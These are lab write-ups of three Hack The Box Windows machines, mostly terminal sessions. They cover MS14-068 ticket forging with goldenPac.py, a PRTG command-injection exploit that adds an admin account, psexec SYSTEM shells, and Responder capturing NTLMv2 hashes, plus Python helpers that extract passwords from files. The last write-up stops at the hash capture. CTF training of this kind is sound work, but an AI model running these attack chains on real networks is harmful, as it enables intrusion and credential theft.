To practice pentesting in an Active Directory environment, I solved an old machine, "Mantis", on Hackthebox.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.52 -sC -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-11 10:47 EEST
Nmap scan report for 10.10.10.52
Host is up (0.039s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-08-11 07:58:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1337/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-08-11T07:49:10
|_Not valid after: 2049-08-11T07:49:10
|_ssl-date: 2019-08-11T07:59:49+00:00; +1m31s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-08-11T07:49:10
|_Not valid after: 2049-08-11T07:49:10
|_ssl-date: 2019-08-11T07:59:48+00:00; +1m31s from scanner time.
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 35m48s, deviation: 1h30m43s, median: 1m30s
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2019-08-11T03:59:49-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2019-08-11 10:59:53
|_ start_date: 2019-08-11 10:48:43
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 768.99 seconds
SMB enumeration:
root@kali:~# smbclient -L 10.10.10.52
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
smb1cli_req_writev_submit: called for dialect[SMB2_10] server[10.10.10.52]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
The IIS site on port 1337 also serves a dev_notes text file under /secure_notes/. At first sight it only holds install notes, but if we scroll to the bottom of the file, past a run of blank lines, there are a few more lines.
root@kali:~# curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
~~~
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez
The "secure format" is only encoding. The long token in the file name, NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx, is base64; decoding it gives the hex string 6d2424716c5f53405f504073735730726421, which is ASCII for m$$ql_S@_P@ssW0rd!. The binary string in the file body is plain 8-bit ASCII and reads @dm!n_P@ssW0rd!. So we have two candidates:
m$$ql_S@_P@ssW0rd! # Possible password for MSSQL
@dm!n_P@ssW0rd! # Possible password for OrchardCMS
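As an added example (not from the original write-up), here is a small Python decoder for the two "secure format" layers in dev_notes: it auto-detects binary, hex and base64 layers and peels them until plain text appears, so it also handles the case where one encoding is wrapped in another, as the file name is. The file name and the binary string are copied from the page; the helper names are my own.

```python
"""Peel the 'secure format' layers from Mantis's dev_notes: base64 -> hex -> ASCII, and raw binary."""
import base64
import re
import string

PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")


def _layer(s):
    """Guess which single encoding layer a string is in, most specific alphabet first."""
    if re.fullmatch(r"[01]{16,}", s) and len(s) % 8 == 0:
        return "binary"
    if re.fullmatch(r"[0-9a-fA-F]+", s) and len(s) % 2 == 0:
        return "hex"  # a hex string is also valid base64, so hex must be tested first
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) and len(s) % 4 == 0:
        return "base64"
    return None


def peel(token, max_layers=5):
    """Decode layer after layer until plain text remains; returns (text, layers_found)."""
    layers, cur = [], token
    for _ in range(max_layers):
        kind = _layer(cur)
        if kind is None:
            break
        if kind == "binary":
            raw = bytes(int(cur[i:i + 8], 2) for i in range(0, len(cur), 8))
        elif kind == "hex":
            raw = bytes.fromhex(cur)
        else:
            raw = base64.b64decode(cur)
        if not raw or any(b not in PRINTABLE for b in raw):
            break  # this layer produced garbage, so the previous result was the real text
        layers.append(kind)
        cur = raw.decode("ascii")
    return cur, layers


def token_from_filename(name):
    """dev_notes_<token>.txt.txt -> <token> (works on the bare file name or the full URL)."""
    m = re.search(r"dev_notes_([A-Za-z0-9+/=]+)\.txt", name)
    return m.group(1) if m else None


# Both values are copied from the dev_notes file on the page.
FILENAME = "dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt"
BINARY_CREDENTIAL = ("010000000110010001101101001000010110111001011111"
                     "010100000100000001110011011100110101011100110000"
                     "011100100110010000100001")

if __name__ == "__main__":
    print(peel(token_from_filename(FILENAME)))
    print(peel(BINARY_CREDENTIAL))
```

The printable check is what stops the loop: without it, peel would happily keep "decoding" a recovered password that happens to look like hex or base64.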
Then try to log in to the SQL server. The notes say a user "admin" was created during the SQL Server 2014 Express install (step 2), so try that account with the MSSQL password.
We have "mssqlclient.py" in the Impacket package, which Kali installs by default.
root@kali:~# /usr/share/doc/python-impacket/examples/mssqlclient.py -p 1433 admin@10.10.10.52
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password: # m$$ql_S@_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL>
Then, list all databases.
SQL> select name from master.dbo.sysdatabases
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
orcharddb
Next, try to find a user table for orcharddb.
SQL> use orcharddb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
SQL> select table_name from information_schema.tables where table_name like '%User%'
table_name
--------------------------------------------------------------------------------------------------------------------------------
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_UserRolesPartRecord
Then pull the user credentials out of the table 'blog_Orchard_Users_UserPartRecord'. First list its columns:
SQL> select column_name from information_schema.columns where table_name='blog_Orchard_Users_UserPartRecord'
column_name
--------------------------------------------------------------------------------------------------------------------------------
Id
UserName
Email
NormalizedUserName
Password
PasswordFormat
HashAlgorithm
PasswordSalt
RegistrationStatus
EmailStatus
EmailChallengeToken
CreatedUtc
LastLoginUtc
LastLogoutUtc
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
admin AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
James J@m3s_P@ssW0rd!
The admin entry is a salted hash (the table has PasswordFormat, HashAlgorithm and PasswordSalt columns), but James's password is stored in plaintext. To confirm that it is also a domain credential, authenticate to SMB as james.
root@kali:~# smbclient -L 10.10.10.52 -U james
Enter WORKGROUP\james's password: # J@m3s_P@ssW0rd!
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
The domain controller is Windows Server 2008 R2 and we now hold a valid domain user, which is exactly what MS14-068 needs: the KDC on an unpatched DC accepts a forged PAC, so an ordinary user can obtain a ticket that claims Domain Admins membership. Impacket's "goldenPac.py", installed by default on Kali, automates this and then runs psexec with the resulting ticket.
First, map the DC's name and the domain (mantis.htb.local and htb.local, as reported by nmap) to 10.10.10.52 in "/etc/hosts" so that Kerberos name resolution works.
Then run the script as follows. It forges the ticket, psexecs into the DC and gives us a SYSTEM shell.
root@kali:~# /usr/share/doc/python-impacket/examples/goldenPac.py htb.local/james@mantis.htb.local
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password: # J@m3s_P@ssW0rd!
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file xcTsamva.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service qxQT on mantis.htb.local.....
[*] Starting service qxQT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
root.txt is in the home directory of Administrator.
Hackthebox is a website that hosts a bunch of vulnerable machines inside its own VPN.
This is a write-up of the machine "Netmon" on that website.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.152 -sC -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-28 12:40 EEST
Stats: 0:16:35 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 60.32% done; ETC: 13:07 (0:10:54 remaining)
Nmap scan report for 10.10.10.152
Host is up (0.31s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 06-24-19 03:13PM 74 output.txt
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_02-25-19 11:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-28 13:07:09
|_ start_date: 2019-06-24 07:07:57
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1616.17 seconds
root@kali:~# ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
02-25-19 11:49PM <DIR> Windows
226 Transfer complete.
2. Getting User
This one is straightforward. The anonymous FTP root is the C: drive itself, so we can walk into the Users folder without any credentials.
ftp> pwd
257 "/users/Public" is current directory.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.30 secs (0.1083 kB/s)
PRTG 18.1.37 (the version in the Server header) has an authenticated remote code execution bug, but to use it we need a PRTG login first.
PRTG keeps its configuration, and backups of it, under "C:\ProgramData\Paessler\PRTG Network Monitor", which anonymous FTP can read:
ftp> pwd
257 "/Programdata/Paessler/PRTG Network Monitor" is current directory.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 12:40AM <DIR> Configuration Auto-Backups
07-01-19 12:17AM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
07-01-19 12:17AM <DIR> Logs (Web Server)
07-01-19 12:22AM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
07-01-19 04:28AM 1723418 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
The file "PRTG Configuration.old.bak" contains a plaintext password for the prtgadmin account. It is a stale backup, though, and the password only works after we adjust it to "PrTg@dmin2019".
Then launch Burp Suite and log in to the PRTG console with it. We do this through Burp because the exploit needs the authenticated session cookie (OCTOPUS1813713946=...) from a logged-in request.
The exploit is Exploit-DB 46527 for CVE-2018-9276, an authenticated OS command injection in PRTG's notification feature (fixed in PRTG 18.2.39). Run it with the cookie and it creates a new local administrator "pentest:P3nT3st!".
root@kali:~# ./46527.sh -u http://10.10.10.152 -c "OCTOPUS1813713946=e0ZDRjY2MjdBLUMzNjEtNEY0Mi1CQ0JGLUU3NUEzQzlBRDZDMX0%3D"
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019 [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg [*]
[*] Version: 18.2.38 [*]
[*] CVE: CVE-2018-9276 [*]
[*] Reference: https://www.codewatch.org/blog/?p=453 [*]
[+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'
[+]#########################################################################[+]
[*] file created
[*] sending notification wait....
[*] adding a new user 'pentest' with password 'P3nT3st'
[*] sending notification wait....
[*] adding a user pentest to the administrators group
[*] sending notification wait....
[*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!
Now we have a local administrator credential, pentest:P3nT3st!.
Use "psexec.py" from Impacket (installed by default on Kali) with it to get a SYSTEM shell.
root@kali:~# /usr/share/doc/python-impacket/examples/psexec.py pentest@10.10.10.152
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file zNVocYtQ.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service aGrP on 10.10.10.152.....
[*] Starting service aGrP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
root.txt is in the directory “C:\Users\Administrator\Desktop”
Hackthebox is a website that hosts a bunch of vulnerable machines inside its own VPN.
This is a write-up of the machine "Querier" on that website.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.125 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 11:04 EEST
Nmap scan report for 10.10.10.125
Host is up (0.039s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-06-18T12:52:51
|_Not valid after: 2049-06-18T12:52:51
|_ssl-date: 2019-06-22T07:06:20+00:00;-1h00m10s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h00m10s, deviation: 0s, median: -1h00m10s
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server
| number: 14.00.1000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-22 10:06:21
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.11 seconds
SMB enumeration:
root@kali:~# smbclient -L //10.10.10.125/
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reports Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
2. Getting User
In the SMB share //10.10.10.125/Reports, we can find an interesting .xlsm file.
root@kali:~# smbclient //10.10.10.125/Reports
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jan 29 01:23:48 2019
.. D 0 Tue Jan 29 01:23:48 2019
Currency Volume Report.xlsm A 12229 Mon Jan 28 00:21:34 2019
6469119 blocks of size 4096. 1508496 blocks available
smb: \>
It looks like an empty Excel workbook.
However, a ".xlsm" file is just a zip archive (Office Open XML) with the macros stored in xl/vbaProject.bin, so we can unzip it and look for anything interesting with the strings command.
root@kali:~# strings xl/*
strings: Warning: 'xl/_rels' is a directory
<?xml version="1.0"encoding="UTF-8"standalone="yes"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac x16r2 xr" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"><fonts count="1" x14ac:knownFonts="1"><font><sz val="11"/><color theme="1"/><name val="Calibri"/><family val="2"/><scheme val="minor"/></font></fonts><fills count="2"><fill><patternFill patternType="none"/></fill><fill><patternFill patternType="gray125"/></fill></fills><borders count="1"><border><left/><right/><top/><bottom/><diagonal/></border></borders><cellStyleXfs count="1"><xf numFmtId="0"fontId="0"fillId="0"borderId="0"/></cellStyleXfs><cellXfs count="1"><xf numFmtId="0"fontId="0"fillId="0"borderId="0"xfId="0"/></cellXfs><cellStyles count="1"><cellStyle name="Normal"xfId="0"builtinId="0"/></cellStyles><dxfs count="0"/><tableStyles count="0"defaultTableStyle="TableStyleMedium2"defaultPivotStyle="PivotStyleLight16"/><extLst><ext uri="{EB79DEF2-80B8-43e5-95BD-54CBDDF9020C}" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main"><x14:slicerStyles defaultSlicerStyle="SlicerStyleLight1"/></ext><ext uri="{9260A510-F301-46a8-8635-F512D64BE5F5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:timelineStyles defaultTimelineStyle="TimeSlicerStyleLight1"/></ext></extLst></styleSheet>
strings: Warning: 'xl/theme' is a directory
macro to pull data for client volume reports
n.Conn]
Open
rver=<
SELECT * FROM volume;
word>
MsgBox "connection successful"
Set rs = conn.Execute("SELECT * @@version;")Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
...
The last fragment is an ODBC connection string from the macro: it connects to the database "volume" on QUERIER as user "reporting" with password "PcwTWTHRwryjc$c6". (The VBA source inside vbaProject.bin is stored compressed, which is why strings only shows scattered pieces of the rest of the macro.)
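Added example, not part of the original post: a Python script that treats the .xlsm as a zip and scans every member's raw bytes for an ODBC connection string, plus a small strings-style scanner. The workbook it builds is constructed here (a stub vbaProject.bin with the macro text stored in the clear); a real vbaProject.bin compresses the VBA source, so on real files run olevba or strings over the extracted parts rather than expecting the regex to always hit.

```python
"""Pull ODBC connection strings (and their passwords) out of a macro-enabled workbook."""
import io
import re
import zipfile

# Driver={...};key=value;... as embedded in VBA source; a value ends at ';', a quote, NUL or newline.
CONN_RE = re.compile(rb"Driver=\{[^}]*\}(?:;[A-Za-z_]+=[^;\x00\r\n\"']*)+")


def strings_like(data, minlen=4):
    """Rough equivalent of `strings`: runs of printable ASCII at least minlen bytes long."""
    return [m.group(0).decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % minlen, data)]


def read_member(xlsm_bytes, name):
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as z:
        return z.read(name)


def find_connection_strings(xlsm_bytes):
    """An .xlsm is a zip (OOXML); scan every member's raw bytes and parse each hit into a dict."""
    found = []
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as z:
        for name in z.namelist():
            for m in CONN_RE.finditer(z.read(name)):
                parts = (p.split(b"=", 1) for p in m.group(0).split(b";"))
                entry = {k.decode().lower(): v.decode(errors="replace") for k, v in parts}
                entry["member"] = name
                found.append(entry)
    return found


def make_sample_xlsm():
    """Constructed workbook: minimal OOXML parts plus a stub vbaProject.bin holding macro text."""
    macro = (b'Attribute VB_Name = "Module1"\r\n'
             b"Sub Macro1()\r\n' macro to pull data for client volume reports\r\n"
             b'Set conn = CreateObject("ADODB.Connection")\r\n'
             b'conn.Open "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;'
             b'Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"\r\n'
             b'Set rs = conn.Execute("SELECT * FROM volume;")\r\nEnd Sub\r\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        z.writestr("xl/workbook.xml", '<?xml version="1.0"?><workbook/>')
        # OLE magic bytes, some binary filler, then the macro text (uncompressed in this stub)
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64 + macro)
    return buf.getvalue()


if __name__ == "__main__":
    for cred in find_connection_strings(make_sample_xlsm()):
        print(cred["member"], cred.get("uid"), cred.get("pwd"))
```

Searching the raw zip bytes would find nothing, because members are deflated; the scanner reads each member through zipfile exactly as unzipping first and then running strings does.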
Then try to connect to MSSQL with this credential.
Kali has Impacket installed by default and we can use its script "mssqlclient.py". "reporting" is a Windows account, so pass -windows-auth.
root@kali:/usr/share/doc/python-impacket/examples# ./mssqlclient.py -windows-auth reporting@10.10.10.125
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password: # PcwTWTHRwryjc$c6
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
Try to execute xp_cmdshell stored procedure.
However, user “reporting” doesn’t have a permission for that.
SQL> xp_cmdshell cmd.exe
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
Next, try to steal the NTLMv2 response of the SQL Server service account.
SQL Server can be made to open a UNC path on a host we control; Windows then authenticates to that share with the service account's own credentials (single sign-on), so the NTLMv2 challenge-response lands on our listener.
Run Responder on the VPN interface, then make the server connect back to it from the SQL session.
root@kali:~# responder -I tun0 -wrfv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ ||-__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 2.3.3.9
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CRTL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [ON]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.2]
Challenge set[random]
Don't Respond To Names ['ISATAP']
[+] Listening for events...
[SMBv2] NTLMv2-SSP Client : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
